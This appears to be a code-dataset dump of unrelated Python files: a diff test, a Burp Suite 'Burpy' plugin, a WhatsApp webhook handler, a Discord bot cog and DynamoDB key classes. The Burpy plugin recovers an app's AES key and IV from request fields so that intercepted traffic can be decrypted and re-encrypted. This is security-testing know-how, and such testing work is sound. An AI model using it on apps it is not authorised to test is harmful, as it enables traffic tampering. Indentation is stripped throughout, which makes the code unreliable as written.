a = """This is a test paragraph. It has some sentences.
I have a lovely bunch of coconuts.
This is another test paragraph. It also has some sentences.
This is a test sentence just floating in space."""
b = """This is a test paragraph. It has some sentences.
This is another test paragraph. It also has some sentences.
I have a lovely bunch of coconuts.
This is a test sentence just floating in space."""
a_tokens = list(text_split.tokenize(a))
b_tokens = list(text_split.tokenize(b))
operations = list(diff(a_tokens, b_tokens))
print("\nDiff 3:")
for op in operations:
if op.name == "equal":
print("equal: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "delete":
print("delete: " + repr("".join(a_tokens[op.a1:op.a2])))
elif op.name == "insert":
print("insert: " + repr("".join(b_tokens[op.b1:op.b2])))
replay_b = [str(t) for t in apply(operations, a_tokens, b_tokens)]
eq_(b, ''.join(replay_b)) | 0.467818 | 0.539832 |
import re
import base64
import hashlib
from urllib import unquote,urlencode
from Crypto.Cipher import AES
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
class Burpy:
'''
header is list, append as your need
body is string, modify as your need
'''
def __init__(self):
    # AES key/IV plus the "apicode" and "head" request fields; all four are
    # (re)derived per request inside encrypt()/decrypt().
    self.key = ""
    self.iv = ""
    self.apicode = ""
    self.head = ""
def main(self, header, body):
print "head:", header
print "body:", body
return header, body
def encrypt(self, header, body):
if(self.apicode != ''):
print "Encryption Called"
self.apicode = re.search(r'.*api/(\d+)\.app', header[0]).group(1)
self.head = body.split("&")[0][len('head='):]
data = unquote(body.split("&")[1][len('body='):])
keyiv = hashlib.md5(self.apicode + unquote(self.head)).hexdigest()
self.iv = keyiv[:16]
self.key = keyiv[16:]
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
data = self.pkcs7padding(data)
encrypted = cipher.encrypt(data)
encrypted = base64.b64encode(encrypted)
body_param = urlencode({"body":encrypted})
ret_body = "head=" + self.head + "&" + body_param
body = ret_body
return header, body
def decrypt(self, header, body):
if(self.apicode != ''):
print "Decryption Called"
self.apicode = re.search(r'.*api/(\d+)\.app', header[0]).group(1)
self.head = body.split("&")[0][len('head='):]
data = unquote(body.split("&")[1][len('body='):])
data = base64.b64decode(data, '-_')
keyiv = hashlib.md5(self.apicode + unquote(self.head)).hexdigest()
self.iv = keyiv[:16]
self.key = keyiv[16:]
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
decrypted = cipher.decrypt(data)
decrypted = self.pkcs7unpadding(decrypted)
ret_body = "head=" + self.head + "&body=" + decrypted
body = ret_body
else:
data = base64.b64decode(body)
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
decrypted = cipher.decrypt(data)
body = self.pkcs7unpadding(decrypted)
return header, body
def sign(self, header, body):
return header, body
def processor(self, payload):
return payload+"burpyed"
def pkcs7padding(self, data):
bs = AES.block_size
padding = bs - len(data) % bs
padding_text = chr(padding) * padding
return data + padding_text
def pkcs7unpadding(self, data):
lengt = len(data)
unpadding = ord(data[lengt - 1])
return data[0:lengt - unpadding] | examples/aes_endec[outdated].py | import re
import base64
import hashlib
from urllib import unquote,urlencode
from Crypto.Cipher import AES
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
class Burpy:
'''
header is list, append as your need
body is string, modify as your need
'''
def __init__(self):
self.key = ""
self.iv = ""
self.apicode = ""
self.head = ""
def main(self, header, body):
print "head:", header
print "body:", body
return header, body
def encrypt(self, header, body):
if(self.apicode != ''):
print "Encryption Called"
self.apicode = re.search(r'.*api/(\d+)\.app', header[0]).group(1)
self.head = body.split("&")[0][len('head='):]
data = unquote(body.split("&")[1][len('body='):])
keyiv = hashlib.md5(self.apicode + unquote(self.head)).hexdigest()
self.iv = keyiv[:16]
self.key = keyiv[16:]
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
data = self.pkcs7padding(data)
encrypted = cipher.encrypt(data)
encrypted = base64.b64encode(encrypted)
body_param = urlencode({"body":encrypted})
ret_body = "head=" + self.head + "&" + body_param
body = ret_body
return header, body
def decrypt(self, header, body):
if(self.apicode != ''):
print "Decryption Called"
self.apicode = re.search(r'.*api/(\d+)\.app', header[0]).group(1)
self.head = body.split("&")[0][len('head='):]
data = unquote(body.split("&")[1][len('body='):])
data = base64.b64decode(data, '-_')
keyiv = hashlib.md5(self.apicode + unquote(self.head)).hexdigest()
self.iv = keyiv[:16]
self.key = keyiv[16:]
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
decrypted = cipher.decrypt(data)
decrypted = self.pkcs7unpadding(decrypted)
ret_body = "head=" + self.head + "&body=" + decrypted
body = ret_body
else:
data = base64.b64decode(body)
cipher = AES.new(self.key, AES.MODE_CBC, self.iv)
decrypted = cipher.decrypt(data)
body = self.pkcs7unpadding(decrypted)
return header, body
def sign(self, header, body):
return header, body
def processor(self, payload):
return payload+"burpyed"
def pkcs7padding(self, data):
bs = AES.block_size
padding = bs - len(data) % bs
padding_text = chr(padding) * padding
return data + padding_text
def pkcs7unpadding(self, data):
lengt = len(data)
unpadding = ord(data[lengt - 1])
return data[0:lengt - unpadding] | 0.246715 | 0.111676 |
from asyncio import gather
from datetime import datetime, timezone
from sanic import Blueprint
from sanic.request import Request
from sanic.response import HTTPResponse, json
from vxwhatsapp import config
from vxwhatsapp.auth import validate_hmac
from vxwhatsapp.claims import store_conversation_claim
from vxwhatsapp.models import Event, Message
from vxwhatsapp.schema import validate_schema, whatsapp_webhook_schema
bp = Blueprint("whatsapp", version=1)
async def publish_message(request, message):
return await gather(
request.app.publisher.publish_message(message),
store_conversation_claim(
request.app.redis,
request.headers.get("X-Turn-Claim"),
message.from_addr,
),
)
async def dedupe_and_publish_message(request, message):
if not request.app.redis:
return await publish_message(request, message)
lock_key = f"msglock:{message.message_id}"
seen_key = f"msgseen:{message.message_id}"
lock = request.app.redis.lock(lock_key, timeout=1.0, blocking_timeout=2.0)
async with lock:
if await request.app.redis.get(seen_key) is not None:
return
await publish_message(request, message)
await request.app.redis.setex(seen_key, config.DEDUPLICATION_WINDOW, "")
@bp.route("/webhook", methods=["POST"])
@validate_hmac("X-Turn-Hook-Signature", lambda: config.HMAC_SECRET)
@validate_schema(whatsapp_webhook_schema)
async def whatsapp_webhook(request: Request) -> HTTPResponse:
tasks = []
for msg in request.json.get("messages", []):
if msg["type"] == "system":
# Ignore system messages
continue
timestamp = datetime.fromtimestamp(float(msg.pop("timestamp")), tz=timezone.utc)
content = None
if msg["type"] == "text":
content = msg.pop("text")["body"]
elif msg["type"] == "location":
content = msg["location"].pop("name", None)
elif msg["type"] == "button":
content = msg["button"].pop("text")
elif msg["type"] == "interactive":
if msg["interactive"]["type"] == "list_reply":
content = msg["interactive"]["list_reply"].pop("title")
else:
content = msg["interactive"]["button_reply"].pop("title")
elif msg["type"] in ("unknown", "contacts"):
content = None
else:
content = msg[msg["type"]].pop("caption", None)
message = Message(
to_addr=config.WHATSAPP_NUMBER,
from_addr=msg.pop("from"),
content=content,
in_reply_to=msg.get("context", {}).pop("id", None),
transport_name=config.TRANSPORT_NAME,
transport_type=Message.TRANSPORT_TYPE.HTTP_API,
timestamp=timestamp,
message_id=msg.pop("id"),
to_addr_type=Message.ADDRESS_TYPE.MSISDN,
from_addr_type=Message.ADDRESS_TYPE.MSISDN,
transport_metadata={
"contacts": request.json.get("contacts"),
"message": msg,
"claim": request.headers.get("X-Turn-Claim"),
},
)
tasks.append(dedupe_and_publish_message(request, message))
for ev in request.json.get("statuses", []):
message_id = ev.pop("id")
status = ev["status"]
event_type, delivery_status = {
"read": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
"delivered": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
"ack": (Event.EVENT_TYPE.ACK, None),
"failed": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.FAILED,
),
"deleted": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
}[status]
timestamp = datetime.fromtimestamp(float(ev.pop("timestamp")), tz=timezone.utc)
event = Event(
user_message_id=message_id,
event_type=event_type,
timestamp=timestamp,
sent_message_id=message_id,
delivery_status=delivery_status,
helper_metadata=ev,
)
tasks.append(request.app.publisher.publish_event(event))
await gather(*tasks)
return json({}) | vxwhatsapp/whatsapp.py | from asyncio import gather
from datetime import datetime, timezone
from sanic import Blueprint
from sanic.request import Request
from sanic.response import HTTPResponse, json
from vxwhatsapp import config
from vxwhatsapp.auth import validate_hmac
from vxwhatsapp.claims import store_conversation_claim
from vxwhatsapp.models import Event, Message
from vxwhatsapp.schema import validate_schema, whatsapp_webhook_schema
bp = Blueprint("whatsapp", version=1)
async def publish_message(request, message):
return await gather(
request.app.publisher.publish_message(message),
store_conversation_claim(
request.app.redis,
request.headers.get("X-Turn-Claim"),
message.from_addr,
),
)
async def dedupe_and_publish_message(request, message):
if not request.app.redis:
return await publish_message(request, message)
lock_key = f"msglock:{message.message_id}"
seen_key = f"msgseen:{message.message_id}"
lock = request.app.redis.lock(lock_key, timeout=1.0, blocking_timeout=2.0)
async with lock:
if await request.app.redis.get(seen_key) is not None:
return
await publish_message(request, message)
await request.app.redis.setex(seen_key, config.DEDUPLICATION_WINDOW, "")
@bp.route("/webhook", methods=["POST"])
@validate_hmac("X-Turn-Hook-Signature", lambda: config.HMAC_SECRET)
@validate_schema(whatsapp_webhook_schema)
async def whatsapp_webhook(request: Request) -> HTTPResponse:
tasks = []
for msg in request.json.get("messages", []):
if msg["type"] == "system":
# Ignore system messages
continue
timestamp = datetime.fromtimestamp(float(msg.pop("timestamp")), tz=timezone.utc)
content = None
if msg["type"] == "text":
content = msg.pop("text")["body"]
elif msg["type"] == "location":
content = msg["location"].pop("name", None)
elif msg["type"] == "button":
content = msg["button"].pop("text")
elif msg["type"] == "interactive":
if msg["interactive"]["type"] == "list_reply":
content = msg["interactive"]["list_reply"].pop("title")
else:
content = msg["interactive"]["button_reply"].pop("title")
elif msg["type"] in ("unknown", "contacts"):
content = None
else:
content = msg[msg["type"]].pop("caption", None)
message = Message(
to_addr=config.WHATSAPP_NUMBER,
from_addr=msg.pop("from"),
content=content,
in_reply_to=msg.get("context", {}).pop("id", None),
transport_name=config.TRANSPORT_NAME,
transport_type=Message.TRANSPORT_TYPE.HTTP_API,
timestamp=timestamp,
message_id=msg.pop("id"),
to_addr_type=Message.ADDRESS_TYPE.MSISDN,
from_addr_type=Message.ADDRESS_TYPE.MSISDN,
transport_metadata={
"contacts": request.json.get("contacts"),
"message": msg,
"claim": request.headers.get("X-Turn-Claim"),
},
)
tasks.append(dedupe_and_publish_message(request, message))
for ev in request.json.get("statuses", []):
message_id = ev.pop("id")
status = ev["status"]
event_type, delivery_status = {
"read": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
"delivered": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
"ack": (Event.EVENT_TYPE.ACK, None),
"failed": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.FAILED,
),
"deleted": (
Event.EVENT_TYPE.DELIVERY_REPORT,
Event.DELIVERY_STATUS.DELIVERED,
),
}[status]
timestamp = datetime.fromtimestamp(float(ev.pop("timestamp")), tz=timezone.utc)
event = Event(
user_message_id=message_id,
event_type=event_type,
timestamp=timestamp,
sent_message_id=message_id,
delivery_status=delivery_status,
helper_metadata=ev,
)
tasks.append(request.app.publisher.publish_event(event))
await gather(*tasks)
return json({}) | 0.297878 | 0.061312 |
import asyncio
import datetime
import random
import urllib.parse
import discord
import requests
from discord.ext import commands
from romme import RepublicanDate
from modules.utils import lists
class Fun(commands.Cog):
conf = {}
def __init__(self, bot):
self.bot = bot
self.config = bot.config
@commands.command(aliases=['8ball'])
@commands.guild_only()
async def eightball(self, ctx, *, question: str = None):
"""
Ask to the 8Ball something
"""
if question is None:
await ctx.send('Oh shit! The crystal ball fell off.... Come back later')
else:
answer = random.choice(lists.ballresponse)
await ctx.send(f"Question: {question}\nAnswer: {answer}")
@commands.command(aliases=['chat'])
@commands.guild_only()
async def cat(self, ctx):
"""
Nekos are life
"""
r = requests.get('https://nekos.life/api/v2/img/meow')
r = r.json()
await ctx.send(r["url"])
@commands.command()
async def dog(self, ctx):
"""
Doggy !!!
"""
r = requests.get('https://random.dog/woof.json')
r = r.json()
await ctx.send(r["url"])
@commands.command()
@commands.guild_only()
async def lovepower(self, ctx, user: discord.Member = None):
"""
What's his love power
"""
if user is None:
user = ctx.message.author
seed = user.discriminator
random.seed(seed)
love = random.randint(1, 100)
if love < 20:
emoji = "💔"
elif love > 20:
emoji = "❤"
elif love > 50:
emoji = '💖'
elif love > 70:
emoji = "💞"
elif love > 99:
emoji = "🖤"
elif love == 69:
emoji = "🔞"
await ctx.send("Love power of {} is {}! {}".format(user.name, love, emoji))
@commands.command()
@commands.guild_only()
async def rd(self, ctx):
"""
Display the Republican Date
"""
today = datetime.date.today()
rd = RepublicanDate.from_gregorian(today.year, today.month, today.day)
try:
await ctx.send(rd)
except discord.HTTPException:
pass
@commands.command()
@commands.guild_only()
async def choose(self, ctx, *, answers: str):
"""
Random choice
"""
toto = random.choice(answers.split())
await ctx.send(toto)
@commands.command()
@commands.guild_only()
async def linux(self, ctx):
"""
Linux joke
"""
answer = random.choice(lists.linux)
embed = discord.Embed(colour=discord.Colour.green())
embed.description = answer
await ctx.send(embed=embed)
@commands.command()
@commands.guild_only()
async def number(self, ctx, number: int = None):
"""
Teach you sth about a number
"""
if not number:
number = random.randrange(1, 1789)
async with ctx.channel.typing():
response = requests.get(f'http://numbersapi.com/{number}')
response_year = requests.get(f'http://numbersapi.com/{number}/year')
await ctx.send("**Number fact** :\n" + str(response.text) + "\n**Year fact** :\n" + str(response_year.text))
@commands.command()
async def trump(self, ctx, tag: str = None):
"""
Trump is a meme
"""
async with ctx.channel.typing():
if not tag:
response = requests.get("https://api.tronalddump.io/random/quote")
else:
response = requests.get(
f"https://api.tronalddump.io/tag/{urllib.parse.quote_plus(tag.lower().strip())}")
r = response.json()
await ctx.send(f"Geek Joke :\n**{r['value']}**")
@commands.command(aliases=["chuck", "norris", "cn"])
@commands.guild_only()
async def chucknorris(self, ctx):
"""
Chuck Norris is GOD
"""
async with ctx.channel.typing():
r = requests.get("https://api.chucknorris.io/jokes/random")
r = r.json()
await ctx.send(r["value"])
@commands.command(aliases=["dev_joke", "programmer_joke", "geekjoke"])
@commands.guild_only()
async def geek_joke(self, ctx):
"""
If you're not a geek, go on your way
"""
r = requests.get('https://geek-jokes.sameerkumar.website/api')
await ctx.send(f"Geek Joke :\n**{r.text}**")
@commands.command()
@commands.guild_only()
async def cookie(self, ctx, user: discord.Member):
"""
Cookie Eater
"""
await ctx.send(
f"**{user.display_name}**, you've been given a cookie by **{ctx.author.display_name}**. :cookie:")
@commands.command()
@commands.guild_only()
async def today(self, ctx):
"""
Teach you sth about today
"""
today = datetime.datetime.now()
async with ctx.channel.typing():
response = requests.get(f'http://numbersapi.com/{today.month}/{today.day}/date')
await ctx.send(response.text)
@commands.command(aliases=["ice-cream"])
@commands.guild_only()
async def ice(self, ctx, user: discord.Member):
"""
Give an ice
"""
await ctx.send(f"{user.mention}, here is your ice: :ice_cream:!")
@commands.command(aliases=["l2g"])
@commands.guild_only()
async def lmgtfy(self, ctx, *, msg: str = None):
"""
Let me google this for you
"""
if not msg:
url = "https://lmgtfy.com/?q=The+answer+to+life&p=1"
else:
url = f"http://lmgtfy.com/?q={urllib.parse.quote_plus(msg.lower().strip())}"
await ctx.send(url)
@commands.command(aliases=["love"])
@commands.guild_only()
async def love_calc(self, ctx, user: discord.Member, user_: discord.Member = None):
"""
Can they date ?
"""
if not user_:
user_ = ctx.message.author
random.seed(int(str(user.id) + str(user_.id)))
if user == user_:
if user.id == 282233191916634113:
love = 0.0
else:
love = 100.00
else:
love = random.randint(1, 10000) / 100
if love < 50:
emoji = "💔"
elif love > 50:
emoji = '💖'
elif love > 70:
emoji = "💞"
elif love > 99:
emoji = "🖤"
await ctx.send(f"{user.name} + {user_.name} = {emoji} | {love}% of love")
@commands.command()
@commands.guild_only()
async def urban(self, ctx, *, search: str):
"""
Urban dic is you new best friend
"""
async with ctx.channel.typing():
url = requests.get(f'https://api.urbandictionary.com/v0/define?term={search}')
url = url.json()
if url is None:
return await ctx.send("The API is broken...")
if not len(url['list']):
return await ctx.send("Couldn't find it...")
result = sorted(url['list'], reverse=True, key=lambda g: int(g["thumbs_up"]))[0]
definition = result['definition']
if len(definition) >= 500:
definition = definition[:500]
definition = definition.rsplit(' ', 1)[0]
definition += '...'
await ctx.send(f"📚 Definitions for **{result['word']}**```fix\n{definition}```")
@commands.command()
@commands.guild_only()
async def rps(self, ctx):
embed1 = discord.Embed(
title=f"Rock, Paper, Scissors",
description="Please type the choice u want to use! \n \n[1] Rock \n \n[2] Paper \n \n[3] Scissors",
colour=discord.Colour.dark_blue()
)
game = ["rock", "paper", "scissors"]
results = ["You Won!", "You Lost!", "A Tie!"]
bot = random.choice(game)
await ctx.send(embed=embed1)
try:
msg = await self.bot.wait_for('message', timeout=120, check=lambda msg: msg.author == ctx.author)
except asyncio.TimeoutError:
await ctx.send('👎', delete_after=3)
message = str(msg.content.lower())
if message not in game and message not in ["1", "2", "3"]:
await ctx.send("Please type a valid value! Was the spelling correct?")
return
if message == bot:
result = results[2]
colour = discord.Colour.blue()
elif (message in ["paper", "2"] and bot == "rock") or (
message in ["rock", "1"] and bot == "scissors") or (
message in ["scissors", "3"] and bot == "paper"):
result = results[0]
colour = discord.Colour.green()
else:
result = results[1]
colour = discord.Colour.dark_red()
embed2 = discord.Embed(
title=f"{ctx.message.author.display_name}'s Rock, Paper, Scissors Game!",
description=f"Bot choice: `{bot.capitalize()}` \n \nYour choice:`{msg.content.capitalize()}` \n \nResult:`{result}`",
colour=colour
)
await ctx.send(embed=embed2)
def setup(bot):
bot.add_cog(Fun(bot)) | modules/fun/fun.py |
import asyncio
import datetime
import random
import urllib.parse
import discord
import requests
from discord.ext import commands
from romme import RepublicanDate
from modules.utils import lists
class Fun(commands.Cog):
conf = {}
def __init__(self, bot):
self.bot = bot
self.config = bot.config
@commands.command(aliases=['8ball'])
@commands.guild_only()
async def eightball(self, ctx, *, question: str = None):
"""
Ask to the 8Ball something
"""
if question is None:
await ctx.send('Oh shit! The crystal ball fell off.... Come back later')
else:
answer = random.choice(lists.ballresponse)
await ctx.send(f"Question: {question}\nAnswer: {answer}")
@commands.command(aliases=['chat'])
@commands.guild_only()
async def cat(self, ctx):
"""
Nekos are life
"""
r = requests.get('https://nekos.life/api/v2/img/meow')
r = r.json()
await ctx.send(r["url"])
@commands.command()
async def dog(self, ctx):
"""
Doggy !!!
"""
r = requests.get('https://random.dog/woof.json')
r = r.json()
await ctx.send(r["url"])
@commands.command()
@commands.guild_only()
async def lovepower(self, ctx, user: discord.Member = None):
"""
What's his love power
"""
if user is None:
user = ctx.message.author
seed = user.discriminator
random.seed(seed)
love = random.randint(1, 100)
if love < 20:
emoji = "💔"
elif love > 20:
emoji = "❤"
elif love > 50:
emoji = '💖'
elif love > 70:
emoji = "💞"
elif love > 99:
emoji = "🖤"
elif love == 69:
emoji = "🔞"
await ctx.send("Love power of {} is {}! {}".format(user.name, love, emoji))
@commands.command()
@commands.guild_only()
async def rd(self, ctx):
"""
Display the Republican Date
"""
today = datetime.date.today()
rd = RepublicanDate.from_gregorian(today.year, today.month, today.day)
try:
await ctx.send(rd)
except discord.HTTPException:
pass
@commands.command()
@commands.guild_only()
async def choose(self, ctx, *, answers: str):
"""
Random choice
"""
toto = random.choice(answers.split())
await ctx.send(toto)
@commands.command()
@commands.guild_only()
async def linux(self, ctx):
"""
Linux joke
"""
answer = random.choice(lists.linux)
embed = discord.Embed(colour=discord.Colour.green())
embed.description = answer
await ctx.send(embed=embed)
@commands.command()
@commands.guild_only()
async def number(self, ctx, number: int = None):
"""
Teach you sth about a number
"""
if not number:
number = random.randrange(1, 1789)
async with ctx.channel.typing():
response = requests.get(f'http://numbersapi.com/{number}')
response_year = requests.get(f'http://numbersapi.com/{number}/year')
await ctx.send("**Number fact** :\n" + str(response.text) + "\n**Year fact** :\n" + str(response_year.text))
@commands.command()
async def trump(self, ctx, tag: str = None):
"""
Trump is a meme
"""
async with ctx.channel.typing():
if not tag:
response = requests.get("https://api.tronalddump.io/random/quote")
else:
response = requests.get(
f"https://api.tronalddump.io/tag/{urllib.parse.quote_plus(tag.lower().strip())}")
r = response.json()
await ctx.send(f"Geek Joke :\n**{r['value']}**")
@commands.command(aliases=["chuck", "norris", "cn"])
@commands.guild_only()
async def chucknorris(self, ctx):
"""
Chuck Norris is GOD
"""
async with ctx.channel.typing():
r = requests.get("https://api.chucknorris.io/jokes/random")
r = r.json()
await ctx.send(r["value"])
@commands.command(aliases=["dev_joke", "programmer_joke", "geekjoke"])
@commands.guild_only()
async def geek_joke(self, ctx):
"""
If you're not a geek, go on your way
"""
r = requests.get('https://geek-jokes.sameerkumar.website/api')
await ctx.send(f"Geek Joke :\n**{r.text}**")
@commands.command()
@commands.guild_only()
async def cookie(self, ctx, user: discord.Member):
"""
Cookie Eater
"""
await ctx.send(
f"**{user.display_name}**, you've been given a cookie by **{ctx.author.display_name}**. :cookie:")
@commands.command()
@commands.guild_only()
async def today(self, ctx):
"""
Teach you sth about today
"""
today = datetime.datetime.now()
async with ctx.channel.typing():
response = requests.get(f'http://numbersapi.com/{today.month}/{today.day}/date')
await ctx.send(response.text)
@commands.command(aliases=["ice-cream"])
@commands.guild_only()
async def ice(self, ctx, user: discord.Member):
"""
Give an ice
"""
await ctx.send(f"{user.mention}, here is your ice: :ice_cream:!")
@commands.command(aliases=["l2g"])
@commands.guild_only()
async def lmgtfy(self, ctx, *, msg: str = None):
"""
Let me google this for you
"""
if not msg:
url = "https://lmgtfy.com/?q=The+answer+to+life&p=1"
else:
url = f"http://lmgtfy.com/?q={urllib.parse.quote_plus(msg.lower().strip())}"
await ctx.send(url)
@commands.command(aliases=["love"])
@commands.guild_only()
async def love_calc(self, ctx, user: discord.Member, user_: discord.Member = None):
"""
Can they date ?
"""
if not user_:
user_ = ctx.message.author
random.seed(int(str(user.id) + str(user_.id)))
if user == user_:
if user.id == 282233191916634113:
love = 0.0
else:
love = 100.00
else:
love = random.randint(1, 10000) / 100
if love < 50:
emoji = "💔"
elif love > 50:
emoji = '💖'
elif love > 70:
emoji = "💞"
elif love > 99:
emoji = "🖤"
await ctx.send(f"{user.name} + {user_.name} = {emoji} | {love}% of love")
@commands.command()
@commands.guild_only()
async def urban(self, ctx, *, search: str):
"""
Urban dic is you new best friend
"""
async with ctx.channel.typing():
url = requests.get(f'https://api.urbandictionary.com/v0/define?term={search}')
url = url.json()
if url is None:
return await ctx.send("The API is broken...")
if not len(url['list']):
return await ctx.send("Couldn't find it...")
result = sorted(url['list'], reverse=True, key=lambda g: int(g["thumbs_up"]))[0]
definition = result['definition']
if len(definition) >= 500:
definition = definition[:500]
definition = definition.rsplit(' ', 1)[0]
definition += '...'
await ctx.send(f"📚 Definitions for **{result['word']}**```fix\n{definition}```")
@commands.command()
@commands.guild_only()
async def rps(self, ctx):
embed1 = discord.Embed(
title=f"Rock, Paper, Scissors",
description="Please type the choice u want to use! \n \n[1] Rock \n \n[2] Paper \n \n[3] Scissors",
colour=discord.Colour.dark_blue()
)
game = ["rock", "paper", "scissors"]
results = ["You Won!", "You Lost!", "A Tie!"]
bot = random.choice(game)
await ctx.send(embed=embed1)
try:
msg = await self.bot.wait_for('message', timeout=120, check=lambda msg: msg.author == ctx.author)
except asyncio.TimeoutError:
await ctx.send('👎', delete_after=3)
message = str(msg.content.lower())
if message not in game and message not in ["1", "2", "3"]:
await ctx.send("Please type a valid value! Was the spelling correct?")
return
if message == bot:
result = results[2]
colour = discord.Colour.blue()
elif (message in ["paper", "2"] and bot == "rock") or (
message in ["rock", "1"] and bot == "scissors") or (
message in ["scissors", "3"] and bot == "paper"):
result = results[0]
colour = discord.Colour.green()
else:
result = results[1]
colour = discord.Colour.dark_red()
embed2 = discord.Embed(
title=f"{ctx.message.author.display_name}'s Rock, Paper, Scissors Game!",
description=f"Bot choice: `{bot.capitalize()}` \n \nYour choice:`{msg.content.capitalize()}` \n \nResult:`{result}`",
colour=colour
)
await ctx.send(embed=embed2)
def setup(bot):
bot.add_cog(Fun(bot)) | 0.321141 | 0.100746 |
from abc import ABC
from typing import Any, Dict, List, Optional, Tuple, Type, Union, cast
from dokklib_db_extended.index import GlobalIndex
from dokklib_db_extended.serializer import Serializer
AnySortKey = Union['SortKey', 'PrefixSortKey']
class EntityName(ABC):
"""Abstract base class of entity names.
Applications must define their entities by inheriting from this class.
Eg. in "app/entities.py":
```python
import dokklib_db_extended as db
class User(db.EntityName):
pass
class Product(db.EntityName):
pass
...
```
"""
def __new__(cls) -> 'EntityName': # pragma: no cover
"""Prevent creating abstract base class."""
raise TypeError(f'{cls.__name__} can not be instantiated.')
@classmethod
def to_prefix(cls) -> str:
"""Convert class name to key prefix.
Returns:
The key prefix. Eg. if class name is 'User', then the prefix is
'USER#'.
"""
if cls is EntityName:
raise TypeError(f'Entity names must inherit from {cls.__name__}.') # pragma: no cover # noqa 501
if 'name' in cls.__dict__ and type(cls.__dict__['name']) is str:
return cls.__dict__['name'].upper() + '#'
return cls.__name__.upper() + '#'
class EntityKey(ABC):
"""Abstract base class of table keys."""
def __init__(self, entity_name: Type[EntityName], value: str):
"""Initialize an EntityKey instance.
Args:
entity_name: The entity type name.
value: The key value.
"""
self._prefix = entity_name.to_prefix()
self._value = value
# New must match init + subclasses' init as well.
def __new__(cls, *args: List[Any], **kwargs: Dict[str, Any]) \
-> 'EntityKey':
"""Prevent creating abstract base class."""
if cls is EntityKey:
raise TypeError(f'{EntityKey.__name__} can not be instantiated.') # pragma: no cover # noqa 501
return cast(EntityKey, object.__new__(cls))
def __str__(self) -> str:
"""Get the string representation."""
# Eg. ENTITY#value
return f'{self._prefix}{self._value}'
def __hash__(self) -> int:
"""Get the hash value."""
return hash(str(self))
def __eq__(self, other: Any) -> bool:
"""Compare semantic equality."""
return str(self) == str(other)
@property
def prefix(self) -> str:
"""Get the entity prefix of the key."""
return self._prefix
@property
def value(self) -> Optional[str]:
"""Get the value of the key."""
return self._value
class PartitionKey(EntityKey):
"""Partition key."""
class SortKey(EntityKey):
"""Sort key with a value."""
# Shouldn't inherit from `SortKey` as `PrefixSortKey` shouldn't pass where a
# `SortKey` is required.
class PrefixSortKey(EntityKey):
"""Prefix only sort key to query relations."""
def __init__(self, entity_name: Type[EntityName], value: str = ''):
"""Initialize a PrefixSortKey instance.
Args:
entity_name: The entity type name.
value: Optional prefix value.
"""
super().__init__(entity_name, value)
class PrimaryKey:
"""Primary (composite) key of a DynamoDB item."""
def __init__(self, partition_key: PartitionKey, sort_key: SortKey):
"""Initialize a PrimaryKey instance."""
super().__init__()
self._pk = partition_key
self._sk = sort_key
self._serializer = Serializer()
def __hash__(self) -> int:
return hash(self._tuple)
def __eq__(self, other: object) -> bool:
if isinstance(other, self.__class__):
return self._tuple == other._tuple
else:
return self._tuple == other
@property
def _tuple(self) -> Tuple[str, str]:
return str(self.partition_key), str(self.sort_key)
@property
def partition_key(self) -> PartitionKey: # pragma: no cover
"""Get the partition key."""
return self._pk
@property
def sort_key(self) -> SortKey: # pragma: no cover
"""Get the sort key."""
return self._sk
def serialize(self, global_index: GlobalIndex) -> Dict[str, Any]:
"""Serialize the primary key to a DynamoDB item.
Args:
global_index: The global index where this key will be used.
Returns:
The serialized key.
"""
pk_name = global_index.partition_key
sk_name = global_index.sort_key
item = {
pk_name: str(self.partition_key),
sk_name: str(self.sort_key)
}
return self._serializer.serialize_dict(item) | dokklib_db_extended/keys.py | from abc import ABC
from typing import Any, Dict, List, Optional, Tuple, Type, Union, cast
from dokklib_db_extended.index import GlobalIndex
from dokklib_db_extended.serializer import Serializer
AnySortKey = Union['SortKey', 'PrefixSortKey']
class EntityName(ABC):
"""Abstract base class of entity names.
Applications must define their entities by inheriting from this class.
Eg. in "app/entities.py":
```python
import dokklib_db_extended as db
class User(db.EntityName):
pass
class Product(db.EntityName):
pass
...
```
"""
def __new__(cls) -> 'EntityName': # pragma: no cover
"""Prevent creating abstract base class."""
raise TypeError(f'{cls.__name__} can not be instantiated.')
@classmethod
def to_prefix(cls) -> str:
"""Convert class name to key prefix.
Returns:
The key prefix. Eg. if class name is 'User', then the prefix is
'USER#'.
"""
if cls is EntityName:
raise TypeError(f'Entity names must inherit from {cls.__name__}.') # pragma: no cover # noqa 501
if 'name' in cls.__dict__ and type(cls.__dict__['name']) is str:
return cls.__dict__['name'].upper() + '#'
return cls.__name__.upper() + '#'
class EntityKey(ABC):
"""Abstract base class of table keys."""
def __init__(self, entity_name: Type[EntityName], value: str):
"""Initialize an EntityKey instance.
Args:
entity_name: The entity type name.
value: The key value.
"""
self._prefix = entity_name.to_prefix()
self._value = value
# New must match init + subclasses' init as well.
def __new__(cls, *args: List[Any], **kwargs: Dict[str, Any]) \
-> 'EntityKey':
"""Prevent creating abstract base class."""
if cls is EntityKey:
raise TypeError(f'{EntityKey.__name__} can not be instantiated.') # pragma: no cover # noqa 501
return cast(EntityKey, object.__new__(cls))
def __str__(self) -> str:
"""Get the string representation."""
# Eg. ENTITY#value
return f'{self._prefix}{self._value}'
def __hash__(self) -> int:
"""Get the hash value."""
return hash(str(self))
def __eq__(self, other: Any) -> bool:
"""Compare semantic equality."""
return str(self) == str(other)
@property
def prefix(self) -> str:
"""Get the entity prefix of the key."""
return self._prefix
@property
def value(self) -> Optional[str]:
"""Get the value of the key."""
return self._value
class PartitionKey(EntityKey):
"""Partition key."""
